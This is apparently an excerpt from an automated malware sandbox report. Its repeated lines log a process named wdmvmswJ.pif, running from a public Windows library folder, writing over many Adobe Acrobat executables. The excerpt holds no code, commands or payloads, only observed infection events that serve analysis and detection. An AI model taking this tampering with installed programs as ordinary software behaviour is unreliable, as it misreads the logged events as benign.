Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
